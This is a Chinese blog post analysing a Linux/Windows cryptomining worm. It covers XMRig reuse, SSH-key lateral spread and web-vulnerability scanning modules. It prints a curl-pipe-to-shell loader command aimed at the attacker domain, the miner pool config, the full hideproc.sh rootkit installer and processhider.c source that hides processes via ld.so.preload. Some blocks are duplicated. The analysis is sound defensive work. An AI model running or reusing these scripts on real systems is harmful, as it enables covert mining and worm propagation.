参考链接:https://mp.weixin.qq.com/s/kZExlJ62LVPOlufkurhBjw
上周末看到了深信服千里目的病毒分析报告,顿时眼睛一亮,这种集合了Windows&&Linux&&Web流量攻击的恶意程序既考察了分析人员的知识广度,又给目前安全形势带来了严峻的考验。同时也让我觉得其实二进制与web之间的关系又近了一步。全栈并不是那么遥不可及!
upx脱壳后,发现go样本,找到main函数,定位到网络连接
域名+请求文件全都明文存储在文件中
放样本跑起来,查看输出(该程序大概功能会检查恶意程序的相关模块,根据系统信息下载对应缺失模块)
请求文件,可以看到病毒作者很人性化,还为我们专门定制了双平台的攻击模块http://m.windowsupdatesupport.org/d/windowsupdatev1.json
我们以main函数中的网络请求之前下断,由此入手调试
地址下断b *0x6681ef,查看后续行为
不错!崩溃了(舰长,很有精神!),每次调试gdb都会崩溃。不浪费时间,换一种调试思路。(补充:下回试试 ltrace和strace)
tcpdump抓包,通过分析流量把该程序后续行为补全,导出http对象
好家伙都给老子下全了,剩下的我们逐个分析
(嚯,好家伙,ubuntu上给我下个pe,nbnb!!你是不是还得给我装个wine?)
二话不多说,火绒剑&&procmon,对症下药
(哟!这程序莫不是被我吓坏了?在我淫威之下屈服了?那老子就看看,不进去)
拖入ida,提示我们缺失dll库(问号脸?_?)
找到动态调用该模块的地方
根据以往经验,大概率挖矿程序都是魔改或梭哈的github开源项目,执行使用strings把字符串全dump出来,找到如下配置文件
再从github上搜一搜,终于让我找到了宁的前身
https://github.com/xmrig/xmrig
作者为了防止被认出,还专门把相关指纹替换了一遍(不错,真tm用心良苦)
实际上,xmmrig.com这个域名根本不存在!
该程序会帮宁安装挖矿所缺失的一切组件,真tm替客户着想!!!
dbus程序前身为github上xmrig挖矿的开源项目
下载processhider.c模块,编译并替换掉/usr/local/lib/libc2.28.so,并添加到/etc/ld.so.preload中,由此再运行的程序都会优先加载preload中的模块
将上述进程 kworkers | dbus | autoupdate 过滤掉,从而达到隐藏进程的目的
(好家伙,上来就先把同行们和挖矿进程都干掉。。。果然搞tm病毒也内卷,赶快收集一波,以后应急先把这脚本跑一遍)
查询出口ip,查询本地ssh私钥和pem证书文件,最后通过查询known_hosts查看连接过的主机
最后通过收集到的私钥连接其他机器使其下载loader.sh进行蠕虫式传播,自此也成就闭环
具备横传能力,危险系数高
(声明,本人对web洞及java研究不深,如有错误,欢迎探讨)
首先upx脱壳,好家伙,又一个go程序,查看导出表(找到了大宝藏)
这些main类中的扫描模块,我们一个一个看(当然,攻击模块还有很多,我就不献丑了)
xxljob (弱密码登后台?)
这个无法确定是哪个洞,一开始我以为是XXL-JOB executor未授权。。但始终没找到相关json串
mongo-express远程代码执行漏洞(CVE-2019-10758)
相关链接:https://vulhub.org/#/environments/mongo-express/CVE-2019-10758/
shiro反序列化(cve-2016-4437)
相关链接:https://vulhub.org/#/environments/shiro/CVE-2016-4437/
tomcat密码爆破
(这个以前玩过,哈哈哈)
seeyon(致远OA远程代码执行漏洞)
相关链接:https://mrxn.net/news/620.html
seeyon(致远OA任意文件上传)
相关链接:https://www.cnblogs.com/sketchpl4ne/p/14515113.html
泛微oa(远程代码执行)
相关链接:https://blog.csdn.net/qq_41757280/article/details/101198845
用友oa(远程命令执行)
相关链接:https://blog.csdn.net/m0_58434634/article/details/117547164
docker daemon api 未授权访问
相关链接:
https://vulhub.org/#/environments/docker/unauthorized-rce/
Struts2(包括S008\S013\S015\S016\S045\S046\S057)
Jenkins插件远程代码执行(不确定)
weblogic console接口远程代码执行漏洞
fastjson 1.2.47远程命令执行
找到main.DownLoadFile函数,交叉引用
下载dubbo.jar模块
下载dubbo.jar对应的攻击参数
可以看到dubbo.jar配置文件中执行的命令为
curl httlp://m.windowsupdatesupport.org/d/loader.sh | sh横向传播,即通过已知的web漏洞进行横向传播
反编译该程序发现包括快速检测和exp(攻击模块)
执行的参数如上
至此,病毒就分析到这里了,这个样本覆盖的知识面相当全面,拿来练手再合适不过。最近两年针对企业端服务器的各种木马越来越多,二进制与web之间的鸿沟也越来越小,希望各位安全员们以此为戒,全面发展才是未来的出路
参考链接:https://mp.weixin.qq.com/s/kZExlJ62LVPOlufkurhBjw
#题外话
最近在找工作,希望以此抛砖引玉,找到份自己心仪的工作,工作地点(北京、天津)感谢!!
web新手,文章若分析有误欢迎共同探讨
{
"linux"
: [{
"filename"
:
"download"
,
"handle"
:
"download"
,
"url"
:
"/download"
,
"ver"
:
"20210002"
},{
"filename"
:
"dbus"
,
"handle"
:
"downrun"
,
"url"
:
"/dbus"
,
"ver"
:
"20210002"
},{
"filename"
:
"hideproc.sh"
,
"handle"
:
"downrun"
,
"url"
:
"/hideproc.sh"
,
"ver"
:
"20210002"
},{
"filename"
:
"sshkey.sh"
,
"handle"
:
"downrun"
,
"url"
:
"/sshkey.sh"
,
"ver"
:
"20210002"
},{
"filename"
:
"autoupdate"
,
"handle"
:
"downrun"
,
"url"
:
"/autoupdate"
,
"ver"
:
"20210012"
},{
"filename"
:
"kworkers"
,
"handle"
:
"update"
,
"url"
:
"/kworkers"
,
"ver"
:
"20210008"
}
],
"windows"
: [{
"filename"
:
"service.exe"
,
"handle"
:
"update"
,
"url"
:
"/service.exe"
,
"ver"
:
"20210008"
},{
"filename"
:
"inj.exe"
,
"handle"
:
"download"
,
"url"
:
"/inj.exe"
,
"ver"
:
"20210003"
},{
"filename"
:
"runtime.dll"
,
"handle"
:
"download"
,
"url"
:
"/runtime.dll"
,
"ver"
:
"20210003"
},{
"filename"
:
"autoupdate.exe"
,
"handle"
:
"downrun"
,
"url"
:
"/autoupdate.exe"
,
"ver"
:
"20210012"
},{
"filename"
:
"updater.exe"
,
"handle"
:
"downrun"
,
"url"
:
"/updater.exe"
,
"ver"
:
"20210003"
}]
}
{
"linux"
: [{
"filename"
:
"download"
,
"handle"
:
"download"
,
"url"
:
"/download"
,
"ver"
:
"20210002"
},{
"filename"
:
"dbus"
,
"handle"
:
"downrun"
,
"url"
:
"/dbus"
,
"ver"
:
"20210002"
},{
"filename"
:
"hideproc.sh"
,
"handle"
:
"downrun"
,
"url"
:
"/hideproc.sh"
,
"ver"
:
"20210002"
},{
"filename"
:
"sshkey.sh"
,
"handle"
:
"downrun"
,
"url"
:
"/sshkey.sh"
,
"ver"
:
"20210002"
},{
"filename"
:
"autoupdate"
,
"handle"
:
"downrun"
,
"url"
:
"/autoupdate"
,
"ver"
:
"20210012"
},{
"filename"
:
"kworkers"
,
"handle"
:
"update"
,
"url"
:
"/kworkers"
,
"ver"
:
"20210008"
}
],
"windows"
: [{
"filename"
:
"service.exe"
,
"handle"
:
"update"
,
"url"
:
"/service.exe"
,
"ver"
:
"20210008"
},{
"filename"
:
"inj.exe"
,
"handle"
:
"download"
,
"url"
:
"/inj.exe"
,
"ver"
:
"20210003"
},{
"filename"
:
"runtime.dll"
,
"handle"
:
"download"
,
"url"
:
"/runtime.dll"
,
"ver"
:
"20210003"
},{
"filename"
:
"autoupdate.exe"
,
"handle"
:
"downrun"
,
"url"
:
"/autoupdate.exe"
,
"ver"
:
"20210012"
},{
"filename"
:
"updater.exe"
,
"handle"
:
"downrun"
,
"url"
:
"/updater.exe"
,
"ver"
:
"20210003"
}]
}
"api"
: {
"id"
: null,
"worker-id"
: null
},
"http"
: {
"enabled"
: true,
"host"
:
"127.0.0.1"
,
"port"
:
61254
,
"access-token"
: null,
"restricted"
: true
},
"autosave"
: true,
"background"
: true,
"colors"
: true,
"title"
: true,
"randomx"
: {
"init"
:
-
1
,
"init-avx2"
:
-
1
,
"mode"
:
"auto"
,
"1gb-pages"
: false,
"rdmsr"
: true,
"wrmsr"
: true,
"cache_qos"
: false,
"numa"
: true,
"scratchpad_prefetch_mode"
:
1
},
"cpu"
: {
"enabled"
: true,
"cpu-affinity"
:
3
,
"threads"
:
3
,
"huge-pages"
: true,
"huge-pages-jit"
: false,
"hw-aes"
: null,
"priority"
: null,
"memory-pool"
: false,
"yield"
: true,
"max-threads-hint"
:
50
,
"asm"
: true,
"argon2-impl"
: null,
"astrobwt-max-size"
:
550
,
"astrobwt-avx2"
: false,
"cn/0"
: false,
"cn-lite/0"
: false
},
"opencl"
: {
"enabled"
: false,
"cache"
: true,
"loader"
: null,
"platform"
:
"AMD"
,
"adl"
: true,
"cn/0"
: false,
"cn-lite/0"
: false
},
"cuda"
: {
"enabled"
: false,
"loader"
: null,
"nvml"
: true,
"cn/0"
: false,
"cn-lite/0"
: false
},
"donate-level"
:
0
,
"donate-over-proxy"
:
0
,
"log-file"
: null,
"pools"
: [
{
"algo"
: null,
"coin"
: null,
"url"
:
"m.windowsupdatesupport.org:443"
,
"user"
:
"x"
,
"pass"
:
"x"
,
"rig-id"
: null,
"nicehash"
: true,
"keepalive"
: false,
"enabled"
: true,
"tls"
: true,
"tls-fingerprint"
: null,
"daemon"
: false,
"socks5"
: null,
"self-select"
: null,
"submit-to-origin"
: false
}
],
"print-time"
:
60
,
"health-print-time"
:
60
,
"dmi"
: true,
"retries"
:
5
,
"retry-pause"
:
5
,
"syslog"
: false,
"tls"
: {
"enabled"
: true,
"protocols"
: null,
"cert"
: null,
"cert_key"
: null,
"ciphers"
: null,
"ciphersuites"
: null,
"dhparam"
: null
},
"user-agent"
: null,
"verbose"
:
0
,
"watch"
: true,
"pause-on-battery"
: false,
"pause-on-active"
: false
"api"
: {
"id"
: null,
"worker-id"
: null
},
"http"
: {
"enabled"
: true,
"host"
:
"127.0.0.1"
,
"port"
:
61254
,
"access-token"
: null,
"restricted"
: true
},
"autosave"
: true,
"background"
: true,
"colors"
: true,
"title"
: true,
"randomx"
: {
"init"
:
-
1
,
"init-avx2"
:
-
1
,
"mode"
:
"auto"
,
"1gb-pages"
: false,
"rdmsr"
: true,
"wrmsr"
: true,
"cache_qos"
: false,
"numa"
: true,
"scratchpad_prefetch_mode"
:
1
},
"cpu"
: {
"enabled"
: true,
"cpu-affinity"
:
3
,
"threads"
:
3
,
"huge-pages"
: true,
"huge-pages-jit"
: false,
"hw-aes"
: null,
"priority"
: null,
"memory-pool"
: false,
"yield"
: true,
"max-threads-hint"
:
50
,
"asm"
: true,
"argon2-impl"
: null,
"astrobwt-max-size"
:
550
,
"astrobwt-avx2"
: false,
"cn/0"
: false,
"cn-lite/0"
: false
},
"opencl"
: {
"enabled"
: false,
"cache"
: true,
"loader"
: null,
"platform"
:
"AMD"
,
"adl"
: true,
"cn/0"
: false,
"cn-lite/0"
: false
},
"cuda"
: {
"enabled"
: false,
"loader"
: null,
"nvml"
: true,
"cn/0"
: false,
"cn-lite/0"
: false
},
"donate-level"
:
0
,
"donate-over-proxy"
:
0
,
"log-file"
: null,
"pools"
: [
{
"algo"
: null,
"coin"
: null,
"url"
:
"m.windowsupdatesupport.org:443"
,
"user"
:
"x"
,
"pass"
:
"x"
,
"rig-id"
: null,
"nicehash"
: true,
"keepalive"
: false,
"enabled"
: true,
"tls"
: true,
"tls-fingerprint"
: null,
"daemon"
: false,
"socks5"
: null,
"self-select"
: null,
"submit-to-origin"
: false
}
],
"print-time"
:
60
,
"health-print-time"
:
60
,
"dmi"
: true,
"retries"
:
5
,
"retry-pause"
:
5
,
"syslog"
: false,
"tls"
: {
"enabled"
: true,
"protocols"
: null,
"cert"
: null,
"cert_key"
: null,
"ciphers"
: null,
"ciphersuites"
: null,
"dhparam"
: null
},
"user-agent"
: null,
"verbose"
:
0
,
"watch"
: true,
"pause-on-battery"
: false,
"pause-on-active"
: false
# hideproc.sh (as dropped by the loader): installs an ld.so.preload hook
# library so the dropper's own processes are hidden from /proc listings.
# Must run as root, since it writes to /usr/local/lib and /etc.
if
[
"$EUID"
-
ne
0
]
then echo
"Please run as root"
else
# Idempotence check: do nothing if /etc/ld.so.preload already names libc2.28.
if
[ `grep libc2.
28
/
etc
/
ld.so.preload` ]
then echo
"hideproc already done!!"
else
# Install a C toolchain.  apt-get, yum and dnf are all attempted in turn;
# there is no set -e, so the ones that do not exist simply fail and the
# script carries on.
apt
-
get update
-
y
apt
-
get install build
-
essential
-
y
yum check
-
update
yum install build
-
essential
-
y
dnf groupinstall
"Development Tools"
-
y
yum group install
"Development Tools"
-
y
# Fetch processhider.c (the readdir hook analysed above) from the same host
# that serves the rest of the kit, and build it as a shared object.
curl http:
/
/
m.windowsupdatesupport.org
/
d
/
processhider.c
-
o processhider.c
# -shared -fPIC produce the preload library; -ldl is for the dlsym() lookup
# of the real readdir.  The output name is chosen to look like a glibc file.
gcc
-
Wall
-
fPIC
-
shared
-
o libc2.
28.so
processhider.c
-
ldl
# Artifact 1: /usr/local/lib/libc2.28.so (built here, not part of glibc).
mv libc2.
28.so
/
usr
/
local
/
lib
/
-
f
# Artifact 2: the library path is appended to /etc/ld.so.preload, so every
# dynamically linked program started afterwards loads the hook.  On a clean
# host this file is normally absent or empty -- a cheap thing to audit.
grep libc2.
28
/
etc
/
ld.so.preload || echo
/
usr
/
local
/
lib
/
libc2.
28.so
>>
/
etc
/
ld.so.preload
# Delete the source, presumably to leave less on disk.
rm
-
f processhider.c
# Self-test: run ls with the preload active, capturing stdout and stderr
# into /tmp/.1 (Artifact 3, left behind).
ls >
/
tmp
/
.
1
2
>&
1
# If that output mentions libc2.28.so (presumably a loader error about the
# library), empty ld.so.preload again rather than leave the host unable to
# run programs.
grep libc2.
28.so
/
tmp
/
.
1
&& echo >
/
etc
/
ld.so.preload
fi
fi
# hideproc.sh (as dropped by the loader): installs an ld.so.preload hook
# library so the dropper's own processes are hidden from /proc listings.
# Must run as root, since it writes to /usr/local/lib and /etc.
if
[
"$EUID"
-
ne
0
]
then echo
"Please run as root"
else
# Idempotence check: do nothing if /etc/ld.so.preload already names libc2.28.
if
[ `grep libc2.
28
/
etc
/
ld.so.preload` ]
then echo
"hideproc already done!!"
else
# Install a C toolchain.  apt-get, yum and dnf are all attempted in turn;
# there is no set -e, so the ones that do not exist simply fail and the
# script carries on.
apt
-
get update
-
y
apt
-
get install build
-
essential
-
y
yum check
-
update
yum install build
-
essential
-
y
dnf groupinstall
"Development Tools"
-
y
yum group install
"Development Tools"
-
y
# Fetch processhider.c (the readdir hook analysed above) from the same host
# that serves the rest of the kit, and build it as a shared object.
curl http:
/
/
m.windowsupdatesupport.org
/
d
/
processhider.c
-
o processhider.c
# -shared -fPIC produce the preload library; -ldl is for the dlsym() lookup
# of the real readdir.  The output name is chosen to look like a glibc file.
gcc
-
Wall
-
fPIC
-
shared
-
o libc2.
28.so
processhider.c
-
ldl
# Artifact 1: /usr/local/lib/libc2.28.so (built here, not part of glibc).
mv libc2.
28.so
/
usr
/
local
/
lib
/
-
f
# Artifact 2: the library path is appended to /etc/ld.so.preload, so every
# dynamically linked program started afterwards loads the hook.  On a clean
# host this file is normally absent or empty -- a cheap thing to audit.
grep libc2.
28
/
etc
/
ld.so.preload || echo
/
usr
/
local
/
lib
/
libc2.
28.so
>>
/
etc
/
ld.so.preload
# Delete the source, presumably to leave less on disk.
rm
-
f processhider.c
# Self-test: run ls with the preload active, capturing stdout and stderr
# into /tmp/.1 (Artifact 3, left behind).
ls >
/
tmp
/
.
1
2
>&
1
# If that output mentions libc2.28.so (presumably a loader error about the
# library), empty ld.so.preload again rather than leave the host unable to
# run programs.
grep libc2.
28.so
/
tmp
/
.
1
&& echo >
/
etc
/
ld.so.preload
fi
fi
/
*
*
Every process with this name will be excluded
*
/
/*
 * Process names to hide from directory listings of /proc.  The readdir
 * hooks below match with strstr(process_to_filter, name), i.e. an entry is
 * hidden when its name is a *substring* of this list -- so "dbus",
 * "kworkers" and "autoupdate" disappear, but so would shorter names such as
 * "update" or "work".  Anything that enumerates /proc without going through
 * the hooked libc readdir (e.g. a static binary or a live-response tool
 * that reads the directory itself) still sees them.
 */
static const char
*
process_to_filter
=
"kworkers|dbus|autoupdate"
;
/
*
*
Get a directory name given a
DIR
*
handle
*
/
/*
 * Resolve the filesystem path of an open DIR handle by reading the
 * /proc/self/fd/<fd> symlink into buf.  Returns 1 on success, 0 if the
 * handle has no descriptor or readlink() fails.  The readdir hooks use it
 * to decide whether the directory being listed is /proc.
 */
static
int
get_dir_name(
DIR
*
dirp, char
*
buf, size_t size)
{
/* dirfd() gives the descriptor backing the DIR stream. */
int
fd
=
dirfd(dirp);
if
(fd
=
=
-
1
) {
return
0
;
}
char tmp[
64
];
snprintf(tmp, sizeof(tmp),
"/proc/self/fd/%d"
, fd);
ssize_t ret
=
readlink(tmp, buf, size);
if
(ret
=
=
-
1
) {
return
0
;
}
/*
 * NOTE(review): readlink() does not NUL-terminate and may return exactly
 * `size`; in that case this store lands one byte past the end of buf and
 * the path is silently truncated.
 */
buf[ret]
=
0
;
return
1
;
}
/
*
*
Get a process name given its pid
*
/
/*
 * Look up the command name of a process from /proc/<pid>/stat and copy it
 * into buf.  `pid` is a /proc directory entry name; anything that is not
 * purely numeric is rejected (return 0).  Returns 0 if the stat file cannot
 * be opened or read, 1 otherwise.  No length is passed for buf, so the
 * caller's buffer (256 bytes at the call site below) is assumed.
 */
static
int
get_process_name(char
*
pid, char
*
buf)
{
/* Only all-digit entries of /proc are pids. */
if
(strspn(pid,
"0123456789"
) !
=
strlen(pid)) {
return
0
;
}
/* tmp doubles as the path buffer and then the line buffer. */
char tmp[
256
];
snprintf(tmp, sizeof(tmp),
"/proc/%s/stat"
, pid);
FILE
*
f
=
fopen(tmp,
"r"
);
if
(f
=
=
NULL) {
return
0
;
}
if
(fgets(tmp, sizeof(tmp), f)
=
=
NULL) {
fclose(f);
return
0
;
}
fclose(f);
/*
 * Parse "<pid> (<comm>" -- the name is the text between the parentheses.
 * NOTE(review): the sscanf() result is not checked, so on a malformed line
 * buf is left uninitialised while the function still reports success; the
 * trailing "s" in the format is a literal character, not a conversion.
 */
int
unused;
sscanf(tmp,
"%d (%[^)]s"
, &unused, buf);
return
1
;
}
static struct dirent
*
(
*
original_
\
struct dirent
*
readdir(
DIR
*
dirp) \
{ \
if
(original_
original_
if
(original_
{ \
fprintf(stderr,
"Error in dlsym: %s\n"
, dlerror()); \
} \
} \
\
struct dirent
*
dir
; \
\
while
(
1
) \
{ \
dir
=
original_
if
(
dir
) { \
char dir_name[
256
]; \
char process_name[
256
]; \
if
(get_dir_name(dirp, dir_name, sizeof(dir_name)) && \
strcmp(dir_name,
"/proc"
)
=
=
0
&& \
get_process_name(
dir
-
>d_name, process_name) && \
strstr( process_to_filter,process_name)) { \
continue
; \
} \
} \
break
; \
} \
return
dir
; \
}
/*
 * Instantiate the interposed readdir64() and readdir() from the macro body
 * above.  Each wrapper resolves the real function with dlsym(), then skips
 * any /proc entry whose process name matches process_to_filter, so programs
 * that enumerate /proc through libc no longer see those processes.
 */
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);
/
*
*
Every process with this name will be excluded
*
/